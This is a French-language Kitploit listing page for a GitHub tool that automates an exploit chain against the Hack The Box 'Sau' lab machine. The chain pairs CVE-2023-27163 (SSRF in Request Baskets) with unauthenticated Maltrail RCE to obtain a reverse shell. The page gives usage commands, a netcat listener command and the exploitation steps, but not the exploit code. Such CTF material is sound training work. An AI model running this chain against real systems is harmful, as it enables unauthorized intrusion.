Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
htb-sau-exploit-chain — Chaîne d'exploitation automatisée pour HTB Sau — CVE-2023-27163 (SSRF) + Maltrail RCE non authentifié → Shell inversée | Kitploit
Outils/GitHubGitHub/tombstoneghost/htb-sau-exploit-chain
Génération de PayloadsExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubtombstoneghost/htb-sau-exploit-chain

htb-sau-exploit-chain

Chaîne d'exploitation automatisée pour HTB Sau — CVE-2023-27163 (SSRF) + Maltrail RCE non authentifié → Shell inversée

Voir le dépôt
4il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Chaîne d'exploitation HTB Sau — CVE-2023-27163 (SSRF) + Automatisation RCE Maltrail

Un script d'exploitation Python qui enchaîne CVE-2023-27163 (Falsification de requête côté serveur dans Request Baskets ≤ 1.2.1) avec une vulnérabilité d'exécution de code à distance non authentifiée dans Maltrail 0.53, délivrant un shell inversé. Conçu pour la machine Hack The Box Sau.


📌 Aperçu

Ce script automatise le chemin d'exploitation nécessaire pour obtenir un accès initial sur la cible en :

  1. Exploitant CVE-2023-27163 pour obtenir un point de terminaison de bucket utilisable
  2. Tirant parti du service exposé pour interagir avec Maltrail
  3. Déclenchant une RCE non authentifiée dans Maltrail
  4. Délivrant un shell inversé à la machine de l'attaquant

⚙️ Utilisation

root@kitploit:~
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Exemple :

root@kitploit:~
python3 exploit.py http://10.10.11.224 10.10.14.6 4444

🎧 Écouteur Netcat (Important)

Avant d'exécuter l'exploit, démarrez un écouteur sur votre machine pour capturer le shell inversé :

root@kitploit:~
nc -lvnp <LISTENER_PORT>

Exemple :

root@kitploit:~
nc -lvnp 4444

🧩 Paramètres

ParamètreDescription
TARGET_URLBase URL de la cible (par ex., http://IP)
LISTENER_IPIP de votre machine d'attaque
LISTENER_PORTPort pour recevoir le shell inversé

🚀 Déroulement de l'exploit

  • Normaliser l'URL cible
  • Déclencher CVE-2023-27163 pour créer/accéder à un panier de requêtes
  • Extraire le point de terminaison accessible (bucket_url)
  • Utiliser le bucket pour interagir avec Maltrail
  • Exécuter la charge utile pour générer un shell inversé

⚠️ Remarques

  • Assurez-vous que votre écouteur est en cours d'exécution avant d'exécuter le script
  • Supprimez le / final de l'URL cible (géré automatiquement dans le script)
  • Conçu spécifiquement pour la machine HTB Sau — peut ne pas généraliser

📚 Références

  • CVE-2023-27163 (Request Baskets)
  • Maltrail Unauthenticated RCE

🛑 Avertissement

Ce projet est destiné à des fins éducatives et à une utilisation dans des environnements autorisés tels que Hack The Box. Ne l'utilisez pas contre des systèmes sans autorisation appropriée.

Télécharger l’outil